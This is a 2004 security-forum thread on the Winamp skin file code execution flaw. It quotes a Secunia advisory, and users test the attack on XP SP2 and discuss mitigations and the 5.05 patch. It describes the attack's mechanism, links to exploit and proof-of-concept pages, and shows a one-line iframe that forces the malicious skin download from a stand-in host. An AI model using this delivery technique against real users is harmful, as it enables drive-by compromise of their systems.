Winamp Skin File Arbitrary Code Execution Vulnerability

[SDK]

Secunia Advisory: SA12381
Release Date: 2004-08-25

Critical: Extremely critical
Impact: System access
Where: From remote

Solution Status: Unpatched
Software: WinAMP 3.x and Winamp 5.x

Description:
A vulnerability has been reported in Winamp, which can be exploited by malicious people to compromise a user's system.

The problem is caused due to insufficient restrictions on Winamp skin zip files (.wsz). This can e.g. be exploited by a malicious website using a specially crafted Winamp skin to place and execute arbitrary programs. With Internet Explorer this can be done without user interaction.

An XML document in the Winamp skin zip file can reference a HTML document using the "browser" tag and get it to run in the "Local computer zone". This can be exploited to run an executable program embedded in the Winamp skin file using the "object" tag and the "codebase" attribute.

NOTE: The vulnerability is reportedly being exploited in the wild.

The vulnerability has been confirmed on a fully patched system with Winamp 5.04 using Internet Explorer 6.0 on Microsoft Windows XP SP1.

Solution:
Use another product.

Provided and/or discovered by:
Discovered by:
"Silent"

Reported in the wild by:
K-OTik.COM Security Survey Team

Source : http://secunia.com/advisories/12381/

[The Grunt]

Thanks for the heads up. I know a ton of people who use winamp, time to whip out the email.

[avdven]

Solution:
Use another product.

Why is that *always* the solution. lol I'll see if I can get a copy of the code that does it and test it on an SP2 system and report the results (wish me luck finding the code). I think with that new ActiveX and Download bar that pops up may prevent the wsz file from being executed.

AJ

[Soda_Popinsky]

http://www.k-otik.com/exploits/08252004.skinhead.php

Here ya go avdven.

[avdven]

Alright. Got the files up and running to try to test it on an Windows XP SP2 machine. I then enabled all the information bar things (since I hate 'em and always have 'em disabled). As soon as I went to the page to see what would happen, I got a notification that said:

"The content might not be displayed properly. The file was restricted because the content doesn't match it's security information. Click here for options..."

When I click "Show Restricted Content", it prompts me to open the .wsz file, save it, or cancel it. So, it looks like (at least based on my test), if you're running SP2 and use Winamp, you're not going to run into the problem *unless you open the file* (which I hope we are all intelligent enough not to do) or unless you have the information bar disabled.

Oh yeah, and it doesn't work in either Opera, so I assume it also doesn't work in Firefox or Mozilla. So if you use any of those, you're probably safe (unless you open the file manually).

Hope that helps some people.

By the way, thanks Soda_Popinsky.

AJ

[Tim_axe]

The first thing I do is lock down Winamp after I get it. The dude who originally programmed it gave AOL the finger when they wanted their AOL Icons on the desktop, and of course made them mad with many other things that you may/may not be aware of. But at least because of him we can change some of the stupid settings to make Winamp more secure than it would have otherwise been.

Anyways, the issue I see is that Winamp has a browser that uses Internet Explorer for processing (as do many other programs, like Windows Media Player, etc.) and if you exploit that you're screwed since you can't quite uninstall IE and can't do anything about programs that depend on vulnerable stuff you can't remove. Locking Winamp down includes not letting media streams switch to "Now Playing" (the browser) but I don't know if other things can still launch it. I don't use much other than the 2.x skin, so this wouldn't bother me much. If you don't download the skins/plugins, (which after the control Winamp 3 gave them, I've disowned 3 and am suspicious of 5), how can you get infected by one?

[pooh sun tzu]

since you can't quite uninstall IE

http://www.litepc.com/xplite.html - for windows systems already installed
http://nuhi.msfn.org/ - for customization of windows installation ISO's

Remove IE and IE's core. It does cripple some applications (automatic updates) but it's completely possible without too much hassel and worry.

If you don't download the skins/plugins, (which after the control Winamp 3 gave them, I've disowned 3 and am suspicious of 5), how can you get infected by one?

The primary exploit it self revolves around IE and Iframes. Using an iframe like:

< iframe src="http://www.blah.com/winamphackedskin.wsz" > would, in any browser, initiatate a downloading process. However, only in IE is it an automagic and behind the scenes download that winamp picks right up on and autoinstalls the skin. The skin itself is the exploit, but the iframe src trick is how it gets installed without your knowledge.

Sodap has a Proof of Concept up:

ttp://www.thebillygoatcurse.com/winamp.html

The winamp skin itself is safe so no worries. It's primary focus is to who how the iframe is forcing the skin download upon winamp (notice opera, firefox, and mozilla request a download confirmation and IE does not).

[Tim_axe]

Thanks for pointing me in the right direction...I've come up with a way to get IE to prompt for download of that.

(Check Screen Shot / Attachment)


(For those that don't want to see the screen shot, just go to the file types and programs thing, and delete the Winamp association. Or go to advanced properties for that file type *.WSZ and make it confirm file downloads like any sane file type. It should solve the problem of downloading behind your back, but not the issue of Winamp executing funky things in the local security zone. And my screen shot demonstrates it in Win2K)



BTW, thanks for the clarification. I thought that you'd install a skin that would open "Now Playing" to a site that takes advantage of IE to install nasty stuff. But it seems that is only half of the issue....

[avdven]

FYI: They released a new version of Winamp (version 5.05) which should resolve the issue.

Here's a bit from the Version History
Winamp 5.05:
* Security bug fix
* Fix for upside down videos through DirectShow
* JTFE v0.96c
* Added prompt when loading a skin for the first time

I'm assuming the "Security bug fix" is the fix for the problem that everyone's been talking about.

AJ

[phishphreek]

Thanks for the update adven.

The "Added prompt when loading a skin for the first time" is probably also part of the security update, no?

I'm not an avid winamp user... I use it sometimes, but not all the time.